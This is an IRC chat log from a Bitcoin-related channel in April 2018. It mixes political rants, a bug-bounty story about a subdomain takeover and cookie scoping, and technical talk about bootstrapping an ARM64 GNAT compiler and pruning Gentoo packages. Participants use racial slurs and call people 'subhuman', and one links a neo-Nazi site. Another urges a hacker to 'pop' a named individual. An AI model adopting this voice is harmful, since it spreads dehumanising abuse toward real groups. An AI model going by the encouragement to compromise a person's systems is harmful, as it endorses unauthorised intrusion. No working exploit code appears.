1792972;1522879780;BigTexasBingo;Network connectivity at the Cowork is down for predictably latino reasons. 1792973;1522879810;BigTexasBingo;Here to actively listen. 1792974;1522880248;mircea_popescu;ben_vulpes ikr 1792975;1522880363;BigTexasBingo;And eat pizza con morons 1792976;1522880444;BigTexasBingo;*morones 1792977;1522880812;mircea_popescu;hehe 1792978;1522881988;mircea_popescu;anyway, since we're reading "slate star codex", ie scott alexander's blog (the pantsuit-annointed official tlp replacement so tlp never actually happened), let's lul together : https://archive.is/Yyblu#selection-1259.852-1259.1460 1792979;1522882002;mircea_popescu;"So Peterson wants to ensure we don’t get to the point where that’s the only choice left; he advises his acolytes not to destroy society (which leads to the chaos/authoritarian dilemma), but to recognize that they’re going to choose to follow some order of some kind, and that they should therefore intentionally follow even a flawed societal order, because it’s better than gas chambers and ethnic cleansing. The reality 1792980;1522882002;mircea_popescu; that “bad things happen to good people” shouldn’t persuade them to tear down society and try starting all over again, because that leads to the chaos/tyrant choice, and we can’t go there." 1792981;1522882018;mircea_popescu;ie, "we [the fried chicken niggers] don't want to go there". ofcourseyoudon't. 1792982;1522882059;mircea_popescu;whole pile is actually a lot of wank in the general vein of, "r jwz, how to survive the coming of mp" 1792983;1522882147;douchebag;Well they already patched my Subdomain Takeover vuln 1792984;1522882162;douchebag;15 minutes for $1,000 rewards - pretty decent imo 1792985;1522882165;mircea_popescu;douchebag did you manage to do anything fun with it in the interim ? 1792986;1522882184;douchebag;I found out that cookies were being scoped from parent domain to subdomains 1792987;1522882197;douchebag;so technically, 1 link click on a legit domain = account pwned 1792988;1522882254;mircea_popescu;not bad. 1792989;1522882364;douchebag;Yeah, this is the main reason I focus on web application stuff 1792990;1522882377;douchebag;People fuck up, and I'm really good and pointing out those fuck ups 1792991;1522882386;douchebag;and chaining multiple fuck ups together to make a super serious fuck up 1792992;1522882418;douchebag;I think most web application developers have the mental capacity of a monkey with autism 1792993;1522882500;mircea_popescu;everyone involved in "technology", especially if the only language they speak is english and even more especially if their general philosophy is in the "I think medical science is still pretty healthy, and that the consensus of doctors and researchers is more-or-less right on most controversial medical issues." vein of above-illustrated jwzism are strictly speaking subhuman, and a great and needless burden to the planet. 1792994;1522882511;mircea_popescu;that's what you get for "getting more people involved" in things. 1792995;1522882540;douchebag;mircea_popescu: To be honest with you, I got into web application hacking just to pwn websites of nerds for lulz 1792996;1522882552;mircea_popescu;i imagined. 1792997;1522882581;douchebag;and eventually I got good enough where I could pop boxes of multi-billion dollar organizations 1792998;1522882587;douchebag;and they pay me for it 1792999;1522882605;mircea_popescu;why do they pay you ? 1793000;1522882667;douchebag;Because they would rather pay me $2k to tell them how I could have dumped their database 1793001;1522882680;douchebag;than for their database to be dumped and lose a shit ton of money & bad press coverage 1793002;1522882702;mircea_popescu;so they "pay" you in the sense of giving you nothing as far as they concerned to get in exchange the very valuable (as far as they're concerned) option to continue exactly as before ? 1793003;1522882719;douchebag;Eh 1793004;1522882729;douchebag;For me I am making alright money for the position I am in 1793005;1522882739;mircea_popescu;now you understand how their shit got written. 1793006;1522882752;douchebag;It's a lot easier for me to get paid directly by them 1793007;1522882756;douchebag;than to go the blackhat route 1793008;1522882808;mircea_popescu;yes dude. the failure of postmodern "democracy" is built out of the mass involvement of idiots who have no business outside of chained-in-dungeon, coupled with weak non-payments to pacify the elite and the self-seeking, comfort driven behaviours of everyone. 1793009;1522882831;douchebag;I don't really like dealing with the blackhat crowd either 1793010;1522882838;douchebag;A lot of them are incredibly stupid 1793011;1522882839;mircea_popescu;of course not. 1793012;1522882875;douchebag;mircea_popescu: BigTexasBingo is asking me in pm for an up 1793013;1522882880;douchebag;idk this person 1793014;1522882884;mircea_popescu;!!up BigTexasBingo 1793015;1522882885;deedbot;BigTexasBingo voiced for 30 minutes. 1793016;1522882951;BigTexasBingo;I don't have civilized desk internet at the moment. Douchebag the goldmine is in burning the god damned colored hats. 1793017;1522882960;mircea_popescu;douchebag anyway, i'm not saying the options you're taking aren't on the table. they are. i am however saying that the table won't last ; which of course is about as interesting in the direct as telling a brontosaurus happily chewing on a fern that a meteoir's coming. "so... what does this mean ~TO ME~, should i switch to chewing palms ?" 1793018;1522882965;mircea_popescu;meteors mean nothing to dinosaurs. 1793019;1522883002;BigTexasBingo;Also in weev land https://dailystormer.name/we-won-but-you-still-need-to-call-the-white-house-today/ can you do it? 1793020;1522883017;douchebag;mircea_popescu: Yeah, it's just a hobby man 1793021;1522883042;mircea_popescu;but as the elite increasingly opts out of supporting the "shiny happy faces of drooling imbeciles" modern of postmodern democracy, the thing will fall. it can't support itself, the only way it can live is for as long as you're willing to take $1k in lieu of "tell you what, I OWN tmobile now, you can all go home / hit the unemployment lines" 1793022;1522883045;douchebag;Hacking stuff is a form of entertainment for me 1793023;1522883066;mircea_popescu;hey. ruining the possibility of pantsuit continuance is entertainment to me. 1793024;1522883068;douchebag;I don't play videogames, hacking stuff is much more entertaining than that 1793025;1522883104;douchebag;and I sure as fuck don't get paid to play video games 1793026;1522883132;mircea_popescu;you could, if you were a "tester". or an "influencer". or whatever. 1793027;1522883132;BigTexasBingo;Douchebag have you tried slaying Incas... In bed 1793028;1522883151;mircea_popescu;the ammounts of money involved in all this are so trivial as to not meet the bar for being called money. 1793029;1522883168;ben_vulpes;so let me get this straight BigTexasBingo the daily derper can't rely on its people to catch up to new ip addresses but it can get the word of mouth out on new dns records? 1793030;1522883172;douchebag;mircea_popescu: I make $700/week from my current job 1793031;1522883191;douchebag;I make anywhere between $1k-20k/month doing my web app pentesting 1793032;1522883205;mircea_popescu;douchebag as things currently stand, if it's fiats and it's not in the billions you're wasting your time. 1793033;1522883226;mircea_popescu;think about it for a second, it's dubious if there are one thousand human beings alive today. the total monetary mass is well past the trillion mark. 1793034;1522883229;BigTexasBingo;Ben_vulpes lowest effort cultures but their story in this case seems to check out. 1793035;1522883235;mircea_popescu;anything less than the billion dollars is the sound of you getting shortchanged. 1793036;1522883246;douchebag;mircea_popescu: Everyone's got to start somewhere, and anyone who knows me knows very well that I am one of the most strong willed people you'll ever meet 1793037;1522883256;mircea_popescu;BigTexasBingo i don't want to read that, can there be a one line summary ? 1793038;1522883261;douchebag;mircea_popescu: I would love to make a billion dollars 1793039;1522883273;douchebag;I've been talking to a few investors in regards to InfoSec 1793040;1522883279;mircea_popescu;douchebag well, from experience you won't make it supporting the system ; but burning it down. 1793041;1522883309;douchebag;Between a few people, I have $3.5million that investors are willing to invest 1793042;1522883310;BigTexasBingo;mircea_popescu Anglin and weev bullied Mexico into taking Honduran refugees 1793043;1522883325;mircea_popescu;BigTexasBingo according to mexico ? or the honduran refugees ? 1793044;1522883325;douchebag;and I have a team of people who are extremely skilled 1793045;1522883337;mircea_popescu;douchebag do you know who ers is/was ? 1793046;1522883347;douchebag;no I do not 1793047;1522883442;mircea_popescu;http://btcbase.org/log/2015-09-07#1265178 << he did the exact same thing, except back when he also had the excuse of "all this being new" and "you don't know how it will go" 1793048;1522883442;a111;Logged on 2015-09-07 12:55 punkman: then http://news.slashdot.org/story/99/12/10/0821224/esr-writes-on-surprised-by-wealth >> and now http://esr.ibiblio.org/?p=6835 1793049;1522883502;douchebag;what do you mean same exact thing? 1793050;1522883513;mircea_popescu;just that. same exact thing. 1793051;1522883551;douchebag;same exact thing as what? 1793052;1522883583;mircea_popescu;"I would love to make a billion dollars ; Between a few people, I have $3.5million that investors are willing to invest ; and I have a team of people who are extremely skilled" 1793053;1522883613;douchebag;So what do you suppose we do? 1793054;1522883661;mircea_popescu;try to leverage technology to convince the political power to give you some decidous leaves inscribed with flattering but ultimately hollow words such as "glory forever!" which will stick around for a season before turning to dust. 1793055;1522883676;mircea_popescu;basically, you're engaging in the up to date equivalent of the athenian poetry competition. 1793056;1522883703;BigTexasBingo;(+mircea_popescu) BigTexasBingo according to mexico ? or the honduran refugees ? << According to developing trumpism and Mexico 1793057;1522883717;mircea_popescu;(no, ustards didn't invent pop culture. britny hilton existed 500 bc, fo sho.) 1793058;1522883732;mircea_popescu;BigTexasBingo link where trump says anglin did something ?! 1793059;1522883740;douchebag;mircea_popescu: Some of the people I have on my stoppped terrorism via hacking 1793060;1522883760;mircea_popescu;douchebag as above : according to whom, "the terrorists" ? 1793061;1522883780;douchebag;Muslims plotting terrorists attacks 1793062;1522883794;mircea_popescu;anyway. some of the classical atenian poets stopped the rain. heck, one even sang his way into hell. he didn't actually accomplish anything down there, but he ALMOST did. 1793063;1522883795;douchebag;IE: Reverse engineering enemy weaponry 1793064;1522883798;mircea_popescu;"that should count for something" 1793065;1522883804;douchebag;SCADA hacking 1793066;1522883806;douchebag;ect.. 1793067;1522883829;BigTexasBingo;Mircea_popescu chance of posturing. Requires more digging. Possibly lulz blooming in the coming weeks, but likely no less than 10 days 1793068;1522883863;douchebag;Cyber Warfare is a real deal, and it's going to continue getting more serious 1793069;1522883914;mircea_popescu;douchebag have you perchance read http://trilema.com/2016/to-be-clear-hillary-clinton-lost-the-presidential-election-on-june-16th-2016/ ? because you might be selling cabbage to the gardners. 1793070;1522884005;mircea_popescu;in simple terms, the terrorists long ago won all possible battles. they're just not who you thought would be the terrorists. 1793071;1522885132;mircea_popescu;aaaanyway, my original curio in http://btcbase.org/log/2018-03-31#1791647 is very much resolved. take the scott alexander fellow from above : he's been around for long enough, writes frequently enough, meets all the other criteria implied in the request. he's very VERBOSE too, and utterly fucking unreadable. 1793072;1522885132;a111;Logged on 2018-03-31 16:40 mircea_popescu: i would really like a list of "all personal blogs older than a decade" right about now. 1793073;1522885161;mircea_popescu;i managed to get to point X of his ENDLESS "i can tolerate anything except the outgroup" "recommended article", after going through another two or three items placed higher on his list of self-recommendations ; but eventually my patience was exhausted. 1793074;1522885225;mircea_popescu;he's not technically on the level of the literate-since-yesterday redditard, but he's very much on the level right above that -- zero intellectual curiosity (in spite of a lot of meta herp derping about it), absolutely no critical ability whatsoever, a complete inadherence to humor, metaphore, rhetorical device, subtext, any sign of an intellectual life whatsoever. 1793075;1522885253;mircea_popescu;he reads to me like someone on antipsychotic medication. maybe at some point in his youth he was intelligent, i guess, but by now i'd much rather listen to the barristas. at least they giggle. 1793076;1522887384;mircea_popescu;"An advertisement costs $250/month or $1250/6 months, plus an extra $50 if you want me to design it for you. Ads can expect about 10,000 to 20,000 impressions per day. Past ads that were interesting and well-targeted have gotten about five hundred clickthroughs in their first week, followed by a steady fifty clickthroughs per week thereafter." jesus christ, and ~nobody reads it on top of everything else. how the fuck do you g 1793077;1522887384;mircea_popescu;et 200 comments out of 2000 readers ? 1793078;1522887405;mircea_popescu;oh, wait, wait. by being this wikitard style of participative democratic cow. i forgot. 1793079;1522895922;deedbot;http://trilema.com/2018/the-letter/ << Trilema - The Letter 1793080;1522897501;asciilifeform;meanwhile, on chinesiumtron, errything, errything worx... but... gnat/ 1793081;1522897509;asciilifeform;no dice re how to even begin to produce an arm64 gnat. 1793082;1522897532;asciilifeform;( that it gotta happen on another machine , is a give, given the impossibility of building a gnat without a working gnat ) 1793083;1522897535;asciilifeform;*given 1793084;1522897585;mircea_popescu;what hangs ? 1793085;1522897597;asciilifeform;the inexistence of a binary arm64 adacore gnat distro 1793086;1522897603;asciilifeform;i.e. nuffin to run. 1793087;1522897636;mircea_popescu;didn't adacore itself release a bare arm gnat ? 1793088;1522897640;asciilifeform;32 1793089;1522897655;mircea_popescu;hm 1793090;1522897659;asciilifeform;( and , on top of this, 'bare' is very different animal from linux ) 1793091;1522897680;mircea_popescu;im pretty sure it was a "raspbian" ie, extra-lame-ubuntu 1793092;1522897689;asciilifeform;correct. for arm32. 1793093;1522897708;mircea_popescu;is the z7000 also 32 ? 1793094;1522897724;asciilifeform;wassat ? 1793095;1522897734;mircea_popescu;zynq-7000, a xilinx wrapper 1793096;1522897756;asciilifeform;aa that -- that's what they stuffed into recent xilinxen in place of the old ppc core 1793097;1522897765;asciilifeform;pogo for that matter is also an arm7 (32) 1793098;1522897807;asciilifeform;arm32 is not hard to find. but doesn't help any in building a working arm64 gnat ( at least no more than working copy of stock x86-64 gnat ) 1793099;1522897834;asciilifeform;arm64 gnat does not appear to exist anywhere, nor anyone publicly mentioned having build one afaik. 1793100;1522897897;mircea_popescu;listen. the zynq is a 64 board ; and it's in the adacore's list of somewhat supported packages. 1793101;1522897919;*;asciilifeform looks... 1793102;1522897938;mircea_popescu;now, it has a whole pile of "intel me" bs (did i mention - xilinx ?) but nevertheless 1793103;1522897984;asciilifeform;xilinx datashit says it's an arm7 1793104;1522897985;asciilifeform;i.e. 32b. 1793105;1522897991;asciilifeform;~= pogo. 1793106;1522897994;mircea_popescu;http://patchwork.ozlabs.org/cover/866607/ worth caching for later lulz 1793107;1522898014;mircea_popescu;asciilifeform zynqMP is 64. 1793108;1522898015;asciilifeform;aka arm cortex a9 1793109;1522898050;asciilifeform;hm 1793110;1522898122;asciilifeform;where's the gnat for it tho 1793111;1522898130;mircea_popescu;yeah... 1793112;1522898196;asciilifeform;aa the arm-eabi-.* bareboard thing 1793113;1522898204;mircea_popescu;gnueabi yeah 1793114;1522898217;asciilifeform;it dunwork on arm64. just tried. 1793115;1522898219;mircea_popescu;now, it may be useful as a stepping stone 1793116;1522898231;asciilifeform;approx as useful as the x86 one lol 1793117;1522898237;mircea_popescu;alternatively, freebsd had a thing for arm64 that may be able to compile a gnat capable to compile your gnat ? 1793118;1522898260;asciilifeform;theoretically can build on on ordinary x64, 'crossdev' 1793119;1522898272;asciilifeform;but annoying that nobody seems to have ever published one or mentioned the existence. 1793120;1522898279;mircea_popescu;seems certain it'll be one of those intermediate-steps-bootstrapping deals. 1793121;1522898316;asciilifeform;i made one for mips in 2016, it was nasty 1793122;1522898374;asciilifeform;this goes right back to the 'buy five moar, or throw the 1 out !' megadilemma. 1793123;1522898387;mircea_popescu;heh. 1793124;1522898406;mircea_popescu;so that;s why "nobody has published". thousand eyes don't do work. 1793125;1522898419;asciilifeform;nobody does a lick of motherfuqinwork. 1793126;1522898426;asciilifeform;abundantly clear. 1793127;1522898450;mircea_popescu;hey, check out the blogger from ealirer, there's enough stream of consciousness commentary there to last a legion of talk therapist. 1793128;1522898530;mircea_popescu;anyway, im pretty sure the adacore people were fucking around with arm64 at some point. maybe asc gingold or someone ? 1793129;1522898800;asciilifeform;btw turned out, asciilifeform's pet was semiregular entomo-reader of subj 1793130;1522898803;mircea_popescu;asciilifeform did you ever get adapro btw ? 1793131;1522898806;asciilifeform;'wassat' 'usefulidjit' 1793132;1522898811;asciilifeform;mircea_popescu: nope 1793133;1522898817;mircea_popescu;want to ? and what subject ? 1793134;1522898837;asciilifeform;not even sure it's a separate proggy; possibly more of a same-proggy + support contract 1793135;1522898864;mircea_popescu;that';s the point, the support contract. can ask gingold and actually expect an answer, as opposed to hope for one. 1793136;1522898878;mircea_popescu;but otherwise it's very much not different in any meaningful way. 1793137;1522898908;mircea_popescu;just... here's the political reasoning : symbolics went to shit ~in part~ because nobody was there to corrupt the idiots involved into turning arms against the empire of stupid that spawned them and stab it in the back. 1793138;1522898944;mircea_popescu;adacore is perhaps the closest contemporary approximation ; why not pay them a little for their pompous if economically dysfunctional "moneymaker" and then brazenly ask them to help you ruin the whole thing ? 1793139;1522898971;asciilifeform;potentially interesting, i did not to date consider it. dun forget tho that they get ~infinite pile of printolade from lockheed, boeing, et al. 1793140;1522898981;mircea_popescu;technologists are universally treasonous, that's fundamentally what the word means, a new face on the old "bastard", son of no father. they might go for it. 1793141;1522898982;asciilifeform;sorta heart of empire item. 1793142;1522899007;mircea_popescu;asciilifeform indeed ; the easiest target is the upperclass housewife. 1793143;1522899020;*;asciilifeform can see it. 1793144;1522899024;asciilifeform;definitely idea. 1793145;1522899095;mircea_popescu;other than that, there's also the spoon+swamp of "get sorta-gnat compiled on arm64 freebsd, use that to compile real gnat, use that to..." 1793146;1522899111;mircea_popescu;are the policeman intelligent or strong ? 1793147;1522899176;*;asciilifeform 'seekritly' aims to break the 'need gnat to gnat' circle of nonsense 1793148;1522899194;asciilifeform;downright african, that thing is 1793149;1522899264;mircea_popescu;i don't see how it's avi 1793150;1522899273;mircea_popescu;avoidable. sooner or later the bootstrap problem kicks in. 1793151;1522899310;asciilifeform;bootstrap pyramidally. e.g. via a 20kb proggy written for a 2kb forth. 1793152;1522899315;asciilifeform;like sane folx. 1793153;1522899327;mircea_popescu;i guess. 1793154;1522899386;mircea_popescu;#ada is asleep ; and in other lulz dbotton disappeared. (guy used to run getadanow.com, maybe still does) 1793155;1522899626;asciilifeform;thing suffers the consequences of being part of the gcc backend swamp. 1793156;1522899641;asciilifeform;( to be fair, not as if there was or is any working alternative. but -- swamp. ) 1793157;1522900626;*;asciilifeform bbl,bed 1793158;1522901865;lobbes;Archive PSA: Semi-automatic archiving has resumed via my "manual" pulling of the crank at irregular intervals as a temporary "stop gap" solution. Fully automatic archiving to resume once I plug my security holes and build a sane parser for urls 1793159;1522901904;mircea_popescu;lol so in the end ns1/ns2.qntra.net are the pizarro nameservers ? 1793160;1522902658;mircea_popescu;also perhaps of some interest : http://gustaf.thorslund.org/src/allegra/doc/allegra.html (ada irc bot ; uses postrgres-ada) 1793161;1522931387;mircea_popescu;^ rfc. 1793162;1522931453;mircea_popescu;ah i guess that didn't get logged. here : 1793163;1522931458;mircea_popescu;* mircea_popescu has changed the topic to: You have reached the public forum of The Most Serene Republic, a terrorist organisation dedicated to the creation of a safe space for the elites to productively defect to, leaving the pantsuit stranded behind. If you'd like to help see http://trilema.com/2016/how-to-participate-in-the-affairs-of-the-most-serene-republic/ . This channel is logged. 1793164;1522931924;mircea_popescu;hey douchebag , here4's some lulz for you : https://wuphysicians.wustl.edu/DesktopModules/Blog/API/RSS/Get 1793165;1522935978;mircea_popescu;BingoBoingo is yer blog down ? 1793166;1522936001;BingoBoingo;It appears to be. Looking into it 1793167;1522936729;BingoBoingo;Aite, it is finding its way back 1793168;1522938836;asciilifeform;in other lulz, 3 nukefest publicalert tests within 1 hr in washingtonistan 1793169;1522938868;mircea_popescu;aww 1793170;1522938869;asciilifeform;( they show up via pnoje ) 1793171;1522938908;asciilifeform;mircea_popescu: pretty great new subjline imho 1793172;1522938916;mircea_popescu;cool deal 1793173;1522940296;lobbes;Incidentally, anyone remember the term "freedom fighter"? I.e. "terrorist that is aligned with the Empire". Almost never heard in Incan media anymore it seems 1793174;1522940610;mircea_popescu;by now too dangerous. 1793175;1522940640;mircea_popescu;back in the 90s inca had a brief momentary delusion of security, in the vein of http://trilema.com/2016/consumerism-is-not-the-answer-though-it-will-put-you-to-sleep-or-american-history-x/ 1793176;1522940934;asciilifeform;lobbes: got replaced in the Official fishwraps with 'moderate rebels' (tm)(r) 1793177;1522941078;mircea_popescu;the moderate rebels of syria, shooting rockets at the elected government. an' the moderate rebels of ukraina, shooting rockets at civillian airplanes. 1793178;1522941306;mircea_popescu;btw asciilifeform ever rotaku'd http://trilema.com/2012/afaceri-particulare/ ? stumbled on it earlier it's fucking hysterical. 1793179;1522942844;*;asciilifeform reads.. 1793180;1522942913;lobbes;Ah yes, "moderate rebels". Man, it'd be lulzy to have a timeline of various fishwrap lifecycles. E.g. "hole in ozone layer" > "global warming" > "climate change" 1793181;1522944963;deedbot;http://qntra.net/2018/04/gun-free-londons-murder-rate-passes-new-york-and-reaches-for-detroit/ << Qntra - Gun Free London's Murder Rate Passes New York And Reaches For Detroit 1793182;1522945279;ben_vulpes;!!key lobbes 1793183;1522945280;deedbot;http://wot.deedbot.org/3320BCA7825525AD077203C331F36D29A4D93652.asc 1793184;1522945497;ben_vulpes;!!v F5FE66C596E8C7AFE15FBF5B58BBCE37DF5AFEAD3D435D615526819CCB2C880D 1793185;1522945501;deedbot;ben_vulpes paid trinque invoice 4 1793186;1522945695;ben_vulpes;douchebag: oh candi_lustt is eminently poppable btw, wonder if you can figure out how to 1793187;1522945707;ben_vulpes;don't want to distract you from your trinquechores tho 1793188;1522945814;trinque;ty ben_vulpes 1793189;1522945826;ben_vulpes;and yourself sir 1793190;1522945872;*;trinque wonders if douchebag realizes what useful work it'd be, to know how easily trb nodes can be popped, given that the wallet will of course have to be sitting right there, with same permissions, on same box, and etc 1793191;1522945895;trinque;(and obviously, ~I do not use the trb wallet~) 1793192;1522945943;ave1;asciilifeform: http://btcbase.org/log/2018-04-05#1793119, with this script http://ave1.org/2018/building-gnat-on-musl-now-with-a-signature/ it is possible to build a cross compiler for aarch64, I will try to use this cross-compiler to then create a native compiler. 1793193;1522945943;a111;Logged on 2018-04-05 03:17 asciilifeform: but annoying that nobody seems to have ever published one or mentioned the existence. 1793194;1522945987;asciilifeform;ave1: i did one for mips ( never properly tested tho ) a few yrs back 1793195;1522946017;asciilifeform;ave1: the surprising bit is the total absence of any mention of a working gnat for arm64 ( despite it being a quite common chip for several yrs ) 1793196;1522946166;asciilifeform;trinque: theoretically 'every private has a marshal's baton in his knapsack', but realistically it is not esp. likely that 'popping trb' had to wait for this 1 d00d to turn 19 or what he was. 1793197;1522946199;asciilifeform;considering the very tangible win from any such thing, going back years 1793198;1522946216;trinque;eh 1793199;1522946226;trinque;we stopped on a perfect copy of openssl did we? 1793200;1522946267;asciilifeform;'not remotely poppable' != 'perfect' 1793201;1522946348;asciilifeform;fwiw it dun hurt to try. ftr, asciilifeform's orig interest in reading the src, long before even running into mircea_popescu et al , was precisely this. 1793202;1522946731;asciilifeform;!!up diana_coman_away 1793203;1522946732;deedbot;diana_coman_away voiced for 30 minutes. 1793204;1522946762;diana_coman_away;thanks! slowly eating logs here 1793205;1522947126;ave1;asciilifeform, I can only find gnats for ubuntu/debian and alpine linux. Also GNAT pro seems to support arm64. 1793206;1522947424;ave1;btw, http://btcbase.org/log/2018-04-04#1792937, how do you notice something like that? 1793207;1522947424;a111;Logged on 2018-04-04 19:52 asciilifeform: meanwhile on the chinesium front, asciilifeform was pretty close to throwing out the 'rockchip' this morn., when saw that every few hrs it read-retries the sd flash. but apparently harmless eggog: comes from certain sad levelling firmwares , they cannot keep up with the host 1793208;1522947486;asciilifeform;ave1: it went into /var/log/messages 1793209;1522947494;asciilifeform;or do i misunderstand the q 1793210;1522947672;asciilifeform;ave1: we had just the other day a thread re 'gnat pro'. it's interesting, in principle, but i sure as fucking daylight ain't ever signing nonredistribution oaths for a compiler 1793211;1522948156;ave1;aha, I was wondering weather you noticed some led blinking, but log would do it 1793212;1522948167;ave1;yes, me neither 1793213;1522948354;asciilifeform;ave1: nah , no led. log noise. and documented, apparently, issue , with some brands of sd, going back years 1793214;1522948364;asciilifeform;appears to be harmless, the retry-read always succeeds 1793215;1522948571;asciilifeform;at any rate, rockchip pilot-plant boxen will boot from sd and mount usb3 stick for root partition. 1793216;1522949025;asciilifeform;ave1: unrelatedly, iirc you're the one who was lucky winner of 1 phree FG ? didja get it yet ? 1793217;1522949545;ave1;yes I was! and no nothing arrived yet... 1793218;1522949562;asciilifeform;went out on mar. the 22. 1793219;1522949657;ave1;well shipping from US has taken anything from 1 to 4 weeks in the past 1793220;1522950918;asciilifeform;ave1: then too soon to say that it was magicked away 1793221;1522953611;trinque;asciilifeform: in general you're probably right, though in general not most are persistent enough to join the republic. 1793222;1522953620;trinque;gotta give the guy worthwhile targets to see 1793223;1522953646;trinque;ftr if the report is "trb's deps are not susceptible to any known RCE" that'd be a fine thing to see written up too 1793224;1522953651;ben_vulpes;today's marvelous self-licking ice-cream-cone: surgeon general suggests that everyone near to folks at risk for overdosing on fentanyl and friends carry naxalone. i for one can't wait to see what the new equilibrium intake rate is without mortality risk looming. 1793225;1522953666;trinque;and obviously that wouldn't be reason to develop a false sense of security either. 1793226;1522953698;ben_vulpes;"audits can only show presence of holes, never the absence" or how did it go 1793227;1522953702;asciilifeform;^ 1793228;1522953921;trinque;rce isn't the only thing that'd be interesting, even cpu bog-down or mem usage DoS would be relevant to staying at the front of the chain. 1793229;1522953981;asciilifeform;it is a little bit funny to talk of bogdown and dos 'vulnerability' in a proggy that happily does o(n) operations at the request of allcomers 1793230;1522954001;asciilifeform;not to mention lets any and all-comers hog sockets for as long as they can come up with fresh ip 1793231;1522954030;asciilifeform;happily does ~by design~ 1793232;1522954093;trinque;AIDS patient doesn't ignore fungus because AIDS, but on the contrary 1793233;1522954128;trinque;its also homework. 1793234;1522954769;asciilifeform;unrelatedly, trinque , ever looked into purging sslism from gentoo ? in particular the existence of /etc/ca-certificates.conf and its contents as a ~mandatory package, i find quite irritating 1793235;1522954895;asciilifeform;( or at the very least, if not purged, every proggy that attempts to lean on usg.pki-ism should generate a log event ) 1793236;1522954897;trinque;just gotta mask it and weep, and kiss whatever wanted it goodbye 1793237;1522954920;*;trinque is on a box currently that's musl + libressl, but I don't know that it's much better 1793238;1522954937;asciilifeform;whole pkiism concept is deeply offensive from a republican pov. 1793239;1522954946;trinque;indeed it is 1793240;1522955020;trinque;-ssl hits some, other ebuilds (and this happens more by the day, on various) don't implement the use flag. "what, of course you want that!" 1793241;1522955059;asciilifeform;i can see an argument for retaining an ability to emulate a sslistic client, for http-fetching heathenware when absolutely must . but beyond this -- it Must Die 1793242;1522955075;*;trinque has considered using the portage profile feature for this 1793243;1522955120;asciilifeform;in particular this thought in asciilifeform's head sprung from noticing a CONFIG_PROTECT_MASK='/etc/gentoo-release /etc/sandbox.d /etc/terminfo /etc/ca-certificates.conf' in the default environment 1793244;1522955127;trinque;have a fascist profile that ideally becomes the only one, and perhaps another profile that's more lax, used for porting over things or w/e. 1793245;1522955134;asciilifeform;i.e. sslism is treated as 'special' and 'precious' evidently in >1 place 1793246;1522955154;trinque;but, if already saying we'll be curating ebuilds I don't see much of a point of the latter 1793247;1522955183;asciilifeform;ultimately ideal would be fully vtronic replacement for portage. 1793248;1522955191;trinque;and we have to eat all of portage, or we'll be in the position I was in when I handed current cuntoo script to diana_coman 1793249;1522955202;trinque;"oh sorry, outside world moved while we held still. build is now broke as a joke." 1793250;1522955215;trinque;this is the primary item on my workbench atm 1793251;1522955220;asciilifeform;well, not 'all of', but the closure-over-the-set of actually-used things 1793252;1522955232;trinque;"be responsible for everything considered republican portage" 1793253;1522955237;trinque;yes not eat all existing ebuilds 1793254;1522955238;asciilifeform;right 1793255;1522955265;asciilifeform;seems like maybe ~150 packages are in practice needed for a Troo Workstation 1793256;1522955266;trinque;own distfiles server, etc 1793257;1522955272;trinque;aha 1793258;1522955272;asciilifeform;and the number can probably be reduced considerably 1793259;1522955300;*;trinque has a busybox userland-golf experiment on the workbench 1793260;1522955304;asciilifeform;good chunk of the installed packages on typical gentoo box is really liquishit 1793261;1522955320;trinque;though dunno if busybox counts, just giant wad of many utils. 1793262;1522955327;trinque;the appeal there is one upstream dependency vs various 1793263;1522955375;asciilifeform;i find busybox to be useful on ancient routers , pogo , & similar , but quite unusable as a unixutils substitute on actual workstation 1793264;1522955396;asciilifeform;it is not even remotely 100% compatible with classical bash etc 1793265;1522955451;trinque;the embedded constraint would, I'd wager, place a constraint on amount of shitgnomaticism to creep in. 1793266;1522955466;trinque;but probably yes, not compatible strictly with latest bash 1793267;1522955471;asciilifeform;imho the long-term answer is '3rd way' , i.e. all the crud i wrote in bash, python, etc over the years really oughta be in the hypothetical little-lisp-in-ada from old thread. 1793268;1522955491;asciilifeform;( and at future date then readily transposable to a sane, nonunixoid os ) 1793269;1522955505;trinque;busybox default doesn't preclude there being a bash ebuild neh? 1793270;1522955517;*;trinque is taking "smallest possible bootable userland" 1793271;1522955520;trinque;*talking 1793272;1522955527;asciilifeform;sure. but a default that nobody uses in battlefield, is not much to brag about. 1793273;1522955537;trinque;fair point. 1793274;1522955553;trinque;I admittedly *don't* use bash in battlefield, but privately on the workbench 1793275;1522955572;asciilifeform;iirc we even have somebody who lives in ksh. 1793276;1522955577;asciilifeform;( or maybe i dreamed this. ) 1793277;1522955741;asciilifeform;in other lulz, sbcl apparently mildly broken on arm64: builds 100% but then ' can't find core file at /usr/lib/sbcl//sbcl.core ' 1793278;1522955747;mircea_popescu;http://btcbase.org/log/2018-04-05#1793180 << i guess, yeah. kinda lotta work for little payoff though, more of stand-up comedy fare 1793279;1522955747;a111;Logged on 2018-04-05 15:41 lobbes: Ah yes, "moderate rebels". Man, it'd be lulzy to have a timeline of various fishwrap lifecycles. E.g. "hole in ozone layer" > "global warming" > "climate change" 1793280;1522955753;asciilifeform;... unsurprising, because it lives in /usr/lib64 1793281;1522955760;asciilifeform;but the path is HARDCODED IN 1793282;1522955766;asciilifeform;because somebody got dropped as a child, evidently 1793283;1522955789;asciilifeform;and yes i'm aware that it can be fixed by setting an evir variable. but WHY SHOULD I HAVE TO 1793284;1522955815;asciilifeform;possibly phf knows who was responsible for this. i'd like for the name to enter the logs. 1793285;1522955984;mod6;Berry McCockiner 1793286;1522956002;asciilifeform;whossat 1793287;1522956052;mod6;made up name, say it out loud. 1793288;1522956056;asciilifeform;lol 1793289;1522956369;mircea_popescu;http://btcbase.org/log/2018-04-05#1793190 << password is strong though. 1793290;1522956369;a111;Logged on 2018-04-05 16:31 trinque wonders if douchebag realizes what useful work it'd be, to know how easily trb nodes can be popped, given that the wallet will of course have to be sitting right there, with same permissions, on same box, and etc 1793291;1522956373;mod6;in other lulz: http://archive.is/vU667 1793292;1522956533;mircea_popescu;http://btcbase.org/log/2018-04-05#1793192 << nice dood! 1793293;1522956533;a111;Logged on 2018-04-05 16:32 ave1: asciilifeform: http://btcbase.org/log/2018-04-05#1793119, with this script http://ave1.org/2018/building-gnat-on-musl-now-with-a-signature/ it is possible to build a cross compiler for aarch64, I will try to use this cross-compiler to then create a native compiler. 1793294;1522956533;ben_vulpes;feculent freight, not bad 1793295;1522956597;mircea_popescu;who the fuck used feculent in a sentence! i was just explaining it yest! 1793296;1522956599;mircea_popescu;fancy teh odds... 1793297;1522956749;mircea_popescu;http://btcbase.org/log/2018-04-05#1793196 << 